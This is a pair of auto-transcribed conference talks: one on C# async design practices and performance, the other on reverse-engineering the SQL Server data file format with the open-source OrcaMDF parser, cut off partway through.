compute the fft. But let's just pretend for argument's sake. Return task.run of... Task.run of... Okay, what this library author has done, this has offered an async version of his API. It is merely a wrapper that creates a thread around the synchronous version of his API. Seems reasonable enough. And the user can change their code to no longer do this. They can just do await.library.compute.fft.async. This is bad practice. Why is it bad practice? Because we should be in the business of telling clients of our library the truth. If something is compute bound, then we should give them a compute bound function. It's up to the user of our library to decide how many threads he wants to allocate. If he's on ASP, he won't want to allocate any threads because that would be a complete stupid thing to do. If he's a top level event handler, then yeah, he will choose to create threads. Creating threads is such a heavyweight operation that it should never be done implicitly. So the guidance there is, never create this kind of wrapper around your APIs. Let's see what I've covered so far. I talked about the task asynchronous pattern, which we've already seen. I talked about the iProgress type and how we use new progress of T, and it always comes back on the user thread. I talked about task.yield, which doesn't. I talked about the iAsync enumerable pattern, which is a beautiful pattern where it's appropriate, where it's not appropriate if most of the time it will be ready immediately. It is appropriate in other places. I said, don't wrap synchronous APIs as async. And don't wrap them the other way around, actually. If you have an asynchronous API, don't offer up a synchronous version that merely calls the asynchronous version. That's not doing users any service. The user, by looking through IntelliSense, should have a good feeling of which of your methods are safe to call and which are not. And I talked about fire and forget APIs and how dangerous they are, but how they're the only use of void asyncs in certain cases. Let's move on. Integrating async into existing code. I need to go back to the code, actually. Let's start from a fresh slate. What should we do? In this case, I imagined that I have an existing application. In this existing application, I'm sorry, again, it's a toy example. It upstates the label. It invokes one subroutine synchronously and then invokes another routine synchronously. And the chief architect said, warning, do not change this. Or maybe it just said, it must be synchronous, because the top level, maybe I'm not in control of it. Maybe I'm only in control of a small corner of the routine. And here, I've been asked to implement this subroutine one, which has to return by the time it's finished. It is not an async method. How am I going to do it? Well, let's have a concrete example to work with. Let's suppose I wanted to helpers.downloadDataAsync again. It says await. Oh, I need the async modifier, and I need it to return task of int. And I should call it the async version. But then the caller has to change into await. And then the caller needs to put async. But I was told, warning, I should not change this. I have to figure out a different way to put a wait corner into my existing piece of code. Let's factor it out. Task t. What if we did t.wait, and then return t.result? What's that complaining about? Ah, int array. Is this going to work? Heck no. We know from the message pump diagram that we've mixed synchronous and asynchronous in the same program, and it's going to lead to the deadlock. We can't do it that way. We'll have to do it a different way. Oops. Well, here's one I did earlier again. You know how when you do message box.show? Then this is kind of a synchronous routine in that execution doesn't return until after it's finished, but it still manages to pump messages just fine with a nested message pump. That is the only way, basically, that we can integrate our corner of async into an existing synchronous application. And I wrote one that does that. t.wait with nested message loop. If I run this...loaded. So it's working okay. I didn't show you that it was responsive in that time, but it is. I used a nested message loop here. Hopefully all of you at this stage think, oh my god, no, nested message loops are terrible. That's true. They're terrible. But they're the only thing we can do in this case. Let's look at how I implemented it. That's not how I implemented it. That's how I went to Stephen Talb's blog, copied down what he had written and put it into my code. He's written a lot more about this. Wait with nested message loop. The sole reason for this routine is to block until a task is finished. If I were doing win forms, it would be easy. I could just do this loop while the task is not yet completed. Application.doEvents. Kind of a busy loop, actually. WPF is, of course, better architected and, of course, much more complicated to understand. But this code does exactly the same thing. It creates a nested message loop to accomplish exactly what we wanted. That's the one side of putting an asynchronous corner into a synchronous existing body of code. What about the reverse of putting a synchronous piece of code into an asynchronous harness? You know that we don't want to run the synchronous, in other words, the blocking code on the UI thread. So we're going to create task.run to run it on a background thread, exactly as we saw already with this computeFFT routine. How about... How about if we're up here and we're down here? Pull. Okay, I'm going to write something different. Button1.content equals ready. I need to have, you know, like in Top Gun, he wants to launch the missiles, but he can't just press the button. He has to flip the cap first, and then the button is exposed. I need to do the same kind of thing here, using await in a surprising way for the control flow. So when you hit... The button normally says ready, but when you hit the button, it's going to uncover it and say fire. The question I'm asking is how can I integrate an existing legacy functionality like the button click handler with new functionality like async? Here's my idea. In other words, how can I turn an event-based thing into a task-based thing? Let's write the code for it. So what this guy did was await button click of button1. In other words, button click had to return a task, or at least something awaitable. The first thing it does is var tcs equals new task completion source. What is a task? A task? Remember, I said in the olden days, a task, people used to think it meant a background thread pool item that run on the thread pool. That's not true. A task is merely a promise. In other words, a task is an object which exists in one of three states. I haven't yet completed, or I have completed successfully, or I have completed with an error. Various events can cause it to transition from the first state to one of the other two states, but that's all it is. It's an object with states that you can hang off continuations that get fired when it transitions to one of the states. So I'm using tcs as my factory to create one of these tasks, one of these promise objects. I'm going to sign up a button click event handler. Onclick is a delegate, which says as soon as it's fired, I'm going to unsubscribe from the button click handler, and then tcs.setResult. I'm going to transition the object from its not yet completed state into its completed state. Question. Why am I using task completion source of object? I'll just say, and then of course I sign up to the button click handler, and then it returns tcs.task. tcs.task is a task of object. My method was only supposed to return a task. Why didn't I just use var tcs equals new task completion source, use the non-generic form, answer the non-generic form doesn't exist, just that didn't seem any point adding it to the framework. So we use the generic form, and that's fine because task of t inherits from t. Anyway, write this code, run this code, it says ready, hit the button once, it says fire, hit it a second time, and it executes. This is a silly example, honestly, and it's not quite good because the button click handler at this stage has two handlers, this one and this one, which are both active, and so I really wouldn't write this. The important thing I wanted to show you was only this routine. This is the core of every time you're going to turn event-based things into task-based things, and there are a heck of a lot of them. One example I had, in the demo I did in the previous thing, I had a storyboard. I wanted to await until the storyboard had finished. When a storyboard finishes, it fires an event, but I want to await until something has finished, so I needed some way to turn the storyboard event into a task. I did it exactly using this style. Let me give you another example. I had a bitmap image. You know how in WPF or Windows 8, when you create a new bitmap image from the source of a URI, it loads it lazily, it loads it asynchronously. You've got the bitmap image, which says, I will come from this URL, but it does not yet load it from that URL until a bitmap image is put there on the XAML, on the form for it to be displayed. I wanted to wait until the bitmap image has been loaded. The reason I wanted to do that is because it's pixel width and it's pixel height property are not valid until after it's been loaded. What if I wanted to base its position on the form based on its pixel height, then I really need to await. I used exactly the same thing. If you have a bitmap image, then it has events for successfully loaded and for failed to download properly. I needed to actually add two delegates. I needed to add onclick success and onclick failed, and in the onclick failed, it invoked tcs.setException with the exception thing. Anyway, this was a completely general mechanism for turning your legacy events into tasks so you can use the task asynchronous pattern. That's one other neat thing we can do. Let's suppose I wanted to be flashy. If I want to just await this guy. Maybe I might not want to do this, but you can imagine doing await storyboard would be a very fluent way of writing it. There is a way to do it. Task awaiter. I'm going to create an extension method. I thought that was enough. Get awaiter. Thank you. Once all of that is present, as long as there is a method called getAwaiter that can be invoked off the thing, either an extension or an instance method. I'll put that up so you can see it. If we have that, then you can await the button directly. I have some stupid bookkeeping to do because, as I told you, it doesn't have the thing. It has the non-generic thing. I just had to put it into the non-generic form. Here we have a technique where you can make your own user-defined types awaitable. That was what I wanted to say about integrating it. I wanted to talk a bit about the code gen and the performance. Is any of this visible at the back? That's complete silence, so maybe it's not even audible at the back. I see a raised thumb. The user writes, async task foo async with the body inside it. There's a heck of a lot of stuff here, and I don't want you to pay attention to all of it, and the slides are available offline if you want to look in a week's time. That's when they'll be available. But I want to say that this gray stuff is what the compiler generates. First, the compiler generates a method with exactly the same signature that you had. Task foo async. What it does is it creates a new state machine object, blah, blah, blah, blah, and it returns builder is async task method builder. That's exactly like the task completion source that we saw earlier, in fact. It says a way of turning events into tasks. That's what we're doing, and it returns it. And the body of the method has been munged into this private void move next. I just put it here. The transformed body goes here. Oh, and you can see here it calling setException and setResult exactly like task completion source. So, if you're looking at your profile logs, and you see, oh, God, this awful function moveNext is stealing all of my CPU cycles. How do I get rid of it? Don't think that. MoveNext is just the function you yourself write. You can also see that there's overhead here. It really is. So, don't put async methods gratuitously. If something is not really async, question, what is the overhead for invoking a method? Let's assume that it's got an empty method body. What is the overhead for merely invoking a method? Well, if it's an async method, the overhead is three times what it is for invoking a non-async method. It might seem a lot, but of course, as soon as you put a single statement in there or three statements, it will be dwarfed by it. But that's the bullpup figure to keep in mind. What does it actually look like? Here I've written code, which says console.rightline of A, then it has an await, then console.rightline of B. So, the code that the compiler generates has console.rightline of A, then it calls this operand of the await.getAwaiter. That's exactly the getAwaiter thing that we saw before when we made the button awaitable. If the awaitable thing has already completed, then let's just get the result from it immediately. GetResult. The job of this is to return the result or to throw any exceptions if there were exceptions from the awaitable thing. Then it nulls out this temp field. We can't just null it out. We have to assign it because it's a structure type with something, the default value of that type. And the reason we null it out immediately is for garbage collection purposes. So there are no dangling references. This is what we call a hot path. If the awaitable thing had already finished, then it just zooms through here really quickly. But if the awaitable thing had not yet finished, it has to do extra work. It has to save the state where it got through in the method. More assignments. And it calls this builder.awaitUncompleted. God, this function is so difficult to understand. I don't know. I'm not even going to try. All I want to say is that it calls into the await object in some way, and it passes it a delegate. And later on, when the await object is finished, then it invokes that delegate. And that delegate causes execution to resume right here. Well, what I wanted you to take away from this is that if you can get through the hot path quickly, your perf will improve dramatically. Let's talk a bit more about Code Gen. Here I've got in x equals 10, await t1 in z equals 10, and then inside I've got nested scope that says in y equals 15. What's it going to do for this? Well, it's going to create the state machine class, and all variables that were in scope at the same level as the await will be lifted into the state machine. All variables that are in the scope that has no awaits will be left local. Actually, that's the statement for C sharp. For VB, it just lifts everything into the state machine. That's because of some design reasons in the VB language. What this means is that if your method accesses local variables like x or z, the compiler will transform them into field accesses. Field accesses are substantially slower than local variable accesses. My rule of thumb was about five times slower. If you're going to combine an await statement with some CPU bound work down here, watch out for this. Maybe factor the CPU bound work into a separate thread. I was going to look at the actual IEL that gets generated in subtle cases, but it's a bit over the top. Let's review things first. Performance. Measure per figure out what the bottlenecks. We see people thinking, oh, I've got to micro-optimize my async code, but what they don't realize is that 95% of the time is being spent waiting for the network. If you're doing that, there's really no point putting any effort into the CPU bound stuff. Really, look at your code with a kind of network big-o notation for you first. If you're doing two network loads sequentially, but you could do them in parallel with the task.win-all, that's where you'll get your bigger performance wins than micro-optimizing. Performance. It's very clear that when we're writing a client application, when forms WPF, phone, desktop, we're optimizing for responsiveness. But when we're writing server applications for ASP or Azure, we're optimizing for throughput. Here, we did some experiments. We made a server. This server makes a query to a back-end service to get an RSS feed. It parses it, and it returns a page with the feed's title. We could implement this in an async way with an async download feed, or we could implement it synchronously with a synchronous download feed, which is better. You know, if you just think about it, it's not clear, because the synchronous case has the extra overhead of tying up an entire thread, but the asynchronous case has the overhead of creating that asynchronous state machine. And the little overhead I talked about earlier. Also, they go through different code paths in the.NET framework. The async download thing is a different code path from the sync download thing, and up until this release, the async code path was a bit rusty. It hadn't been optimized as hard as it should. In the old days of ASP, you had a thread pool of 20 threads, which means that if you tied up a thread for too long, bang, all of the threads were exhausted and you couldn't handle any more requests. In the modern day of ASP, you have the full thread pool available, and it goes quite well if you configure, if you tweak the things, say, if you raise the max thread pool up to 1,000 things, then it can deal with as many threads as it will realistically be able to handle. In our experiments, we did get a bit better perf with async. You can see just being able to handle a few higher requests per second. And actually, all commercial web services and things like Node.js have also moved async just because it has the potential to be more efficient whether or not we've reached that dream yet with the current.NET. Question. If we are using synchronous ASP, does the thread pool wrap up quickly enough? It was another experiment. We start with no requests per second, and then we zoom it up to 750 requests per second. I picked that number because I know, I happen to know, after I would tweak ASP's thread pool, that it could, once it built up to enough threads, it could handle that rate pretty well. But look at this. The thread pool climbing algorithm does so pretty slowly. Five minutes, and it still hadn't responded to the burst in traffic. So, async responds immediately, of course. That's one of the reasons why async was handier. I've just stressed measure perf forms, and only if perf is a problem, then try ideas. Here's one idea. Async task F return await load async. If I look at method and it has return await, I'm a bit suspicious. Because remember, the whole point about the async modifier is it wraps up the return operand into a task. And the whole point of the await keyword is that it takes a task and it unwraps it. So this code could more simply be written without an async method. That's good. And we can use this trick in some useful places. Here, I'm going back to the iasync enumerator. It says, well, my original code used to enter the async method in all cases, but if I already had data, I'd just return it immediately. But what I can say and then do await if it didn't have data, I can make it into two separate methods for performance. If the data is already available, then return task.fromResult of the thing. Task.fromResult will create a task much more efficiently than the whole async machinery. Indeed, in the simple cases, 0, 1, 2, 3, true, false, empty string, task.fromResult just returns a pre-allocated result so it doesn't even have any heap allocation. Only if the hot path was not available did I fall into the slow path. So really, I can hand-optimize the hot path. What I told you about the lifting variables is that if I've got an await and CPU-bound work in the same method, here, buff is used in the await and also inside the CPU-bound work, I should factor that out into a separate thing in my ASP to improve throughput. Finally, if you don't need to return to the UI thread, remember, after an await, it always returns back to the calling synchronization context. If we're inside a library routine and we don't need that, like while we've still got more stuff, await, load more async, I could have just done.configureAwaitOfFalse, that tells it, don't bother returning back to the UI context or wherever you were. Just continue with this method wherever you happen to be. That will be quite a lot quicker. The UI threads are very slow-thrilling to return to comparative. I mean, fast by UI standards, but slow by internal computation standards. Those are the performance and optimization things I've got. By the way, for you guys in Redgate, there was one slide that I put in. Oh, yeah, this shows what AL is generated in the more complicated cases. I didn't talk about that at all. And I'm not going to. That's everything I wanted to say. I've given you idea of the design patterns that we've learned over the past two years. This is just a start. The first of those years was spent furiously fixing bugs, trying to teach other people about async, just getting the feature working in the first place. So we haven't had that much of a runway to develop the best practices. And actually, what I'm really hoping is that it will be you guys who come and figure out the best practices and write blog posts, and then we'll look at what you've written and develop it. I've also shown you the mixing techniques for how to mix async into your legacy code, into event handlers, how to put sync inside a message loop. And with these hints about performance and code gen, I think you have the opportunity to create responsive, high throughput responsive client apps or high throughput Azure or ASP apps. Thank you very much. Thank you.
|
The new Async language feature is easy enough to use in common scenarios. But as the software architect or expert in your team, you’ll want to know more -- what are the best design practices? where are the hidden performance bottlenecks? how can you make your own code blend seamlessly with the new ‘await’ keyword? how does it actually work under the hood? how can you stretch it in powerful ways? You’ll leave this talk an expert on async.
|
10.5446/50983 (DOI)
|
I'm kind of excited to see what you will get from this. So once you start dripping down and just falling over, that's the point that I'm going to pick it up and do it a bit harder. So I usually give the warning at the beginning that this session is not meant to cheat. It's meant to inspire you. You're not meant to learn all of what I'm saying here today. You're just meant to pick up a bit of it and get an idea of what's happening. So don't fret if there's something you don't understand. I'm going to be up here afterwards. Just enjoy the show. And you've been warned. So no complaints afterwards. This is where I usually start spending 10 minutes about who I am. Suffice to say, I'm the tech leader of a small company in Denmark. And I have no fancy titles. I'm not an MVP. I'm not an MCM. I'm nobody. So why am I here? About a year ago, I started an open source project just as a hobby. And today, it's ended up with a standalone parcel for SQL Server data files written in CCR with a payload of about 256 kilobytes. And it'll pass about 98% of the AdventureWorks database that ships with SQL Server 2008 R2. And it's open source. So you can get the source. You can use it. It's completely open. I want to show a quick example of how we used to query SQL Server. We would create a SQL connection, a command, the reader, and then loop all of the rows. Very simple. Now with OrcMDef, it's kind of different. You just instantiate the database. You give it the paths of the database files. If you have multiple, just put them in any order. OrcMDef will pass them and find out which they are. You create a data scanner. And you tell it to scan the person's table. And then you can print out the rows if you want. Those are standard data rows. You can just loop them. You can also do predicates. So you can say where the field age, which is of type short, is less than 40. So it has full link support. So you can just query it. It also scan indexes. You just create an index scanner. And you can scan the CXPersonAID index on the person's table. And once again, you just get standard data rows with index data in it. And you can even query DMVs, dynamic management views, which contains a lot of metadata in SQL Server. And those are a bit interesting, because they're not persistent disk. So they actually simulated live. And I'll show you later on how it works. And I have a quick demo. I'm not going to show you the code actually running, because there's quite a lot of it. But I also created a small GUI for it, since there was two downloads in GitHub. So I wanted somebody to be able to try this outside of me. I've got a standard Adventureworks database. And just to show that SQL Server is not running, I rename it. I can do it. It's not locked. It's a normal file. And I can open it up. And all KMDF Studio will find it, show me all the tables. And I can do a select from the product table. And I've got the product data. I can sort it. I can query it. I can set filters in it. And it just gives me the data. I can also go and query the DMVs. So if we want to see all the tables, I can just query it. Or if we want to go a level deeper, we can look at the base tables that SQL Server uses with the actual internal metadata that all KMDF passes. So you can download all KMDF Studio. It works today. It's completely open source. And it uses all KMDF under the hood. So in SQL Server, we have a number of data files. Just to keep it simple, a database is a single file. And the file is just one big array of these eight kilobyte chunks, known as pages. And each of these pages has a 96 byte header and an 8,000 96 byte body. And everything in SQL Server is stored in this page format. So everything, metadata, your indexes, your data, whatever you have, everything is stored on these pages. At the end of that body in the page, we have what's known as the slutter rate. And the slutter rate defines the logical order of the rows on these pages. So if we read that one backwards, we have row zero stored up here. We'll read the next one. And it just shows us where all of the rows are stored. They're not necessarily stored in physical order on the page. So we have to read the slutter rate to find out where is the data on this row, on this page. And the records that I just showed you. Records is the same as a tuple. It's a row. It's the actual row of data that's stored in the data pages. These stores both the data, they store the indexes, they store your source code for your stored procedures, for your views. Everything is stored as records on pages in data files. And all of these records are stored in a format known as the fixed bar format. And I'll go a bit more in depth to this in just a moment. It's got a couple of status bytes that shows a bit about what's stored in this record. Then there's two bytes that points to the null bitmap, which I'll also go into detail in just a bit. Right after that pointer, we have all of the fixed-length data. So this is where your integers are stored, your chart 10, all of your data types that have a fixed length, they're stored in this portion of the record. Then we've got null bitmap. First, we've got to count how many columns are stored in the null bitmap. And then we have the actual null bitmap. And I'll tell you what it is in just a bit. And finally, we have the variable length section of the record. So this is where all of your variable length data is stored. Those are your strings, your var decimals, whatever we don't at the beginning know what the size is. So the first status byte has eight bits, naturally. It's got a single bit that tells the version. This is always zero in the sequence of 2008 plus. We've got the record type. Is this a data record? Is it an index record? It's got three bits to tell what kind of record it is. It might not have a null bitmap. And if it doesn't, it will tell us that there isn't a null bitmap in this record. It also might not have any variable length columns. And in that case, it'll also tell us that you shouldn't expect there to be a variable length data section. Finally, SQL Server might add some versioning information. So if you're using Snapshot Isolation and it stores an earlier version in TempDB, it adds this 14 byte structure to record. And this bit will be set in that case. And finally, we have a single unused bit. Which is kind of weird when you're looking at the next status byte, because only one bit is used. So why wouldn't they just compress that into one byte? I haven't gotten an answer from them. But most likely, it is for adding features in the future. If they ever wanted to expand this with just one extra bit of information, they would have to expand every row in your database with one byte. And that would cause fragmentation all over the place and basically be impossible for them. By wasting one byte per row, they retain the possibility of adding features later on. And this is guesswork. There's a lot of guesswork today, because I don't work for Microsoft. I don't have the source code. I've played with a lot of it. And I have some guesstimates. But I might be lying to you. So be warned. So null bitmap is some bytes that track with the columns and null or not. So every column that you have in your record will have a bit in the null bitmap. And if that bit is set, it means the column has a null value. So if you have eight columns, we will use eight bits, a single byte. If you have nine columns, we're going to use nine bits, which will take up two bytes space. So in that regard, you actually get some columns for free. So you have to divide it by eight to find out how many bytes are used to store the null bitmap. And usually, the null bitmap is always present in data pages on data records. But there are a few exceptions where they're not present. And generally, you never care about this. But once you start passing this stuff, you're going to run into all sorts of weird combinations. And you discover some funky stuff. And you'll have a field day looking through it. Also, null bitmap, it'll use one byte, even if you have just one column. So we have seven bits that are not used. And you would guess that those will probably be set to zero, so they're not null. But they're just garbage. What SQL sort of creates this null bitmap, it just takes the bytes from memory somewhere, flips the bits it needs, and just pushes it down to disk. So you might have some data that just doesn't make sense. The variable length of settery is this last part of the record. We've got the first 10 bytes, which is the fixed length data. Then we've got two bytes that tell us how many variable length data columns do we have in this record. And then for each of these, we have a two byte pointer that tells this is where the data stops in the record. Because we know when the data starts, right after those pointers, and if we know where the data stops, we can find the data for that given column. So we can just find the actual length of data for each of these variable length data columns in our record. We've got a small sample. This is a normal record. We've got a couple of status bytes. We've got the fixed length pointer, the null bitmap pointer. Since there's no fixed length data in this table, we only have a voucher, it starts right here. So we've got the null bitmap. We've got one variable length column. It ends at bind index 15. And if we look at this, we know it starts here, and it ends here. So these are our bytes, and they correspond to the value that's been inserted into the table. So this is a very simple example of how the variable length data section works. And this format is used in a lot of different places in SQL Server, so it's pretty important. And we'll be looking at a lot more of those. So one common misconception is that if you have null columns, the data will always be stored on page if it's a fixed length column. So if you have 10 nullable bitmaps and nullable integers and all of those are null, they will take up 40 bytes on your record. Even if they're null, they will be stored on disk. For variable length data types, that is not the case. They will not be stored on disk, but they will retain that 2-byte pointer in the variable length data section. So they will use the two bytes, no matter what. And if you only have a single variable length data column, you will also use those two bytes to track how many variable length data columns you have on our record. So there's a lot of wasted space, even if these values are null. The one exception is for tail columns. So if you have a new column that you're adding that is nullable, SQL Server will actually just see in the metadata there's an integer at the very end, but there's no data on disk, so it must be null. And that is the only case where you can actually have a non-persistent, nullable fixed length data type. In 2012, you can do the same with default values. So if you add an integer that is not nullable, but has a default value, SQL Server will register that in metadata and actually not have to touch disk. So that can save some space. And more importantly, you can add this integer column to your terabyte database without blowing everything up. Otherwise, it would have to touch each of these records on disk. So in all versions, prior to 2012, it will have to touch disk once you add a fixed length column to your table. So when I started passing this, one of the first things I needed to pass was the header in the file in those pages. So those 96 bytes I needed to pass those. The problem is there's absolutely no documentation out there. There's some great books written, but none of them touch the page. Header. Outside of just saying these 96 bytes are the header. So I tweeted out and Kimberly Tripp, one of the greatest SQL Server gurus, wrote me back, well, basically you can use time patients and this undocumented command called dbcc page, which I'll show you in just a moment. So let me show you how I found out what the header firmware format is. I've got this small tool that I wrote that just converts between different number systems. So I can write decimal, binary, or hex, whatever I want to write decimal, binary, or hex, whatever I want. And it'll just show me the different values. It's also open source. It's also GitHub on my account. Very simple. So what I'll do is just create a normal database. This is just an empty database. I'll create a table and sort a couple of rows. It doesn't really matter what it is. We just need a table. And then I'll use another undocumented command called dbcc ind. What this does is to tell us the page IDs of the pages that are used for this table. In this case, the one we're interested in is page 147, which is the data page for this table. And by using dbcc page on page 147, we can see the actual bytes that are stored on disk for this page. We've got all of the bytes here. Most of them are zeros, given that there's nothing on the page. More importantly, what it shows us up here is the header. So it tells us that we've got three records in this page. And if we look at the header down here, the first 96 bytes, we can start looking for that values. We just thought it was a value of three. And is there a three? There's a three right there. So we've got a single value of three that we know because dbcc page tells us. And there's only one place in the header where the value of three is stored. So obviously, that must be it. So we've just found one of these fields. We've also got one 8,057. And if we convert that, we should look for 79 1f. And we've got it right there. So we can start just looking at these values that dbcc page tells us is stored and just look at the bytes. Where are they actually stored? Now, the problem is there's also a header version one. And if we look at the bytes down there, we've got a one right there. We've got one right there. We've got one. There are lots of ones right here. There's two of them right there. So we don't really know which one of these is the one. Anyone have a suggestion? So what I done did was to find the actual file where it stored. I'll just copy its path. And then I will shut down SQL Server. While doing that, I'll open a hex editor. Open the file itself. And we know that this is page 147. And we know that each page is 8192 bytes long. So this is the offset in the file where data is stored. So if I go to that offset in my hex editor, what we see are the actual bytes. And right now, we've got a lot of zeros right here. So let's just do this. And this is where dba starts to cry when I show this. And you shouldn't do this. So I've just entered some mobile jumble into my database. I'm going to restart SQL Server. And I'll reconnect to my database. And if we do a select star from our table, I've just corrupted our database. So SQL Server can't even read the table anymore, because it doesn't know what to do with the data. And once it does that, it disconnects you from the database. So I'll just reconnect to it. Now what's interesting is that the dbcc page will actually still pass whatever it can do. It'll do a best effort passing. And if we look at it now, we can see that it points to the next page, which is page ID 13,330. And obviously, there's no such page. So it's got a weird value. We can also see that there's currently 30,806 rows in the page. And that would be equal to it having about a quarter of a byte per row, which doesn't make sense. But if we look at that 30,806, we should look for the hex values 56,78. And if we go around here, we see 56,78. And you can kind of guess how this goes on. You can just sit there and substitute these values, trying to look them out. And slowly but surely, you're going to lose your girlfriend. But you're going to get the header format down at some point. And fortunately, the format is the same, no matter the page type. So what you'll end up with once you do this is a file like this, which is the whole header just written in C sharp, full of the fields. And then divide the indexes to full of the fields. And then finally, just reading them in. So at this point, I've got the whole header format spec'd out. And you won't find this in Google except for these source files. So this is completely undocumented. But now you've got it. So that's one step down. But yes, usually speak very fast. This is based on an eight hour pre-con, but shoot. Yes? And what about other programs want to use that database using SQL Server APIs? Could you have perfected those users? I couldn't in this case, given that I completely shut down SQL Server and just wrote into the file that was completely offline. When I get data back, like when I've restarted SQL Server? When this database is active. Yes? And you use this program. Oh, if I use OrchemDF. OrchemDF is completely read-only. So you can connect to database that's live, given that SQL Server locks it. But if you do a volume Seattle copy of the file, you can read it through OrchemDF. And there's no impact. Completely read-only at this point. But can it be truly online? Or it can be put data into it while you are reading? It can put it into it. But the thing is, you can read the data file while SQL Server is using it because SQL Server locks it. But if you take a volume Seattle copy of it, so basically a point-in-time snapshot of the file, you can read that one. And the real file will still work. So it's just a point-in-time snapshot that you're reading off. Point-in-time snapshot? Yes. OK, so it didn't realize. Exactly. And I suppose that you are only able to read the MDF, but not the transaction log, right? Yes. So the database has MDF files, data files, and it has log files. I only read data files at this point. That will answer part of your question. Because in that case, if somebody's making changes, they'll change their type of file, not even that file. Yeah. So I want to do log files, but I got to get rid of the puny remains of my life before I start doing that. So at this point, I have to head up. But there's still a lot of data stored on the pages. So if you look at different data types, we basically have two different types. We have the fixed length types, and we have the variable length data types. They're just two different parts of the fixed record format. The fixed length types are bits, char, insidia, decimal, state. All of these always have the same length. The variable length data types are all of your string types. You also have XML types in there, anything that has a variable length. And there's also this little bugger called SQLVariant, which can be anything. And you generally don't want to use it, so I try to hide it away. If you're using it, shame on you. There's rarely a good reason for it. I'm not going to go into all of the data types. I do not have the time for it. But there's one of them that's quite interesting, videsimal, which is a decimal stored in a compressed format where it only takes up as many bytes as it needs. So it's a fixed length data type that's been made into a variable length data type. Once you look at it, when you define it, you define the scale and the processions. You define how many decimals do you want, and where should the comma be placed? So internally, decimals just stored as one big humongous value. It doesn't know anything about processional commas. But that nine just defines at what index should replace the comma in this big humongous number. So we're storing 123456.789. And what SQLTEN actually does is to store these in groups of three. And if you have a group of three, you need to represent the numbers from 0 through 999. And we can do that using 10 bits, which represents the numbers for 0 and 1,024. So we're basically wasting 25 extra values. But if you look at the different sizes they could have chosen, do you want to do 10 bits for three decimals? Do you want to do 14 bits for four decimals? There's a big waste of these. And 10 is pretty much the most optimal size to have used. Obviously, I could care less about this. It was just fun to exercise to try and reason why we did choose that size specifically. So what SQLTEN does is to store the groups of numbers that actually have values. And all of these zeros will just be truncated, because we don't need them. The metadata tells us you should expect there to be two more groups of zeros. And we just save those 20 bits by not having to store those extra numbers in disk. And I've got a very lengthy blog post in this, in case you're really bored someday. So looking at the variable length data types, we've got two of those. We've got slabs and labs. And labs are large objects. And slabs, I kid you not, are small large objects. Those are the official definitions of them. So slabs, those are VARTSHAR, NVARTSHAR, and VARBINARYX. X being from 1 to 8,000. If you want to have a larger value, you need to use the LARP types, like text, NSEC, image. Those are the classic ones. And you have the newer ones, the max types, VARTSHAR, max, NVARTSHAR, max, and so forth. And let me just show you how they work. I have got an empty database. I created a table with two VARTSHAR 8,000 columns. And I will insert a single row in there, well, two rows, each of them having 3,000 characters. And did I do that? I think I did. So using dbccind, we've got a data page, page ID 148. And using dbccpages, we can find the bytes. And seeing as you can already read this already, I'm just going to go quickly. We've got status byte, fixed length pointer, two columns, none of them are null. We've got two variable lengths. And these are the pointers that we want to look at. So C50B and 7D17, those are the pointers that point to the end of the data in the record. And if we try and convert some of those values, we've got C50B, that's 3,013, meaning we've got 13 bytes of overhead, then we've got 3,000 characters. So the data ends at 3,013. Looking at the other one, we've got 7D17, 6,013. So 3,013 plus 3,000 extra characters of data. Very simple. So let's try and insert a record with 2,500 length columns. Now we've got the data page 161. If we take a look at it, we've got the exact same format. And we have got 9513. So 5,013, 13 bytes of overhead, 5,000 bytes of data. The other one is 8093. So that ends at byte index 37,805, even though the page is no longer that 8 kilobytes. So something is amiss. What I found out is that once we need to represent this number, we have got 16 bits. But we really only need 15 bits, because it can't be any more than 8,192. And 15 bits is plenty for that. So we've got a single bit to spare. And it seems that if you just flip the very last bit, you get a value of 5,037, which is much more sensible. It's still not the data to be looking for, but at least it's a valid value. So what they use that very last bit for is to indicate that this is not the data you're looking for. This is a complex column that is going to show you where the data is. And they use these for row overflow, which means in this case you've got two 5,000 character columns. They can't be stored on a single page. So one of those columns is pushed off to another page and a pointer is left behind. If you look at that pointer, the DCC page will actually show you that pointer and the value is in it. So I looked at it, and I saw it had an update sequence value which corresponded to the bytes in red. It had some pointers, which is the blue stuff. And then it had a timestamp with this value down here, which kind of corresponds to what's stored on disk. The only thing is that this is stored in little indians, so the first bytes are the most significant ones. And we need those four 0's right here, but they are not stored on disk. And I used way too much time just trying to figure out what was I doing wrong until I cried on Twitter. And Paul Randall, another excellent database girl, SQL so girl, he worked on the team back in the days, and well, they're not stored on disk. And you'll run into a lot of these situations where there's just no clear answer, there's just some implementation details that you'll have to just guess about, or be lucky that they'll answer you on Twitter or find somebody. But generally, you just have to guess. So anyways, I now knew the format of this pointer structure. Looking on disk, we've got the ID of this complex column, which is 2. We've got a field, the level. I can correspond these to what's stored, what DBCC page tells me is up there. We have got the timestamp as well. Interestingly enough, they got a field called unused. I'm not sure whether it's used or not, but it's called unused. I don't know what it's for. More importantly, we've got the size of the data. We've got the page ID, the file ID, and the slot ID on that page. So using this pointer, we can find out where the data is. And if we then look up that slot, that record, where it stored at, we will find a record known as a blah fragment record. It's got a couple of status bytes that tells it this is the kind of record. This is blah fragment record. A fixed length pointer that points to the very end of the record. So all of the data is stored in this part, which is the fixed length block. And what's in here is a specific structure that stores a timestamp that matches what's in the pointer. So it can match up to 2 and check that it wrote this at the same time. We've got an ID that tells what kind of structure is this. And finally, we've got the data itself, which we can read. Once you row overflow, these will be put on pages known as text mix pages. And if you have multiple columns that are overflowing from the same table, they may be stored on the same overflow pages provided there's space for it. So it's not going to allocate a complete 8 kilobyte page, even if you overflow like 2 kilobytes of data. It'll just push in more of those. So once it pushes off row, it will only do so if your data is larger than 24 bytes, given that the pointer itself is 24 bytes. So it doesn't make sense to overflow anything smaller than that. Once it does so, it'll leave behind what's known as a blob inline root pointer, which is this 24 byte structure that I just showed you. It'll push it off to a blob fragment record on its text mix page. And one issue is that performance can be difficult to predict, because you're inserting a record with 6,000 characters of data. And you expect it to be inserted in rows. You've got a previous page, new page, new page. What you don't know is that there's already a record on there with 4,000 bytes of data. So your record is going to be pushed off somewhere else. So when the disk needs to read your data, it's going to go like this, just trying to find your data all over the hard drive. So it can be very difficult to predict what kind of performance you're going to get, because you'll basically get fragmented reads, because some of your data is pushed off row. Those were the slabs, the small large objects. Now I'll show you the large objects, watch our max. So these are the new kinds of large objects. I will. So just need to disconnect this guy and connect this guy. Just do like this. So I'll create an empty database. We've got a table. I've got a Jafar file some column just to put in some dummy data. We're not going to use it just to take up some space. And a watch our max. Then I'll just insert the values, a, b, 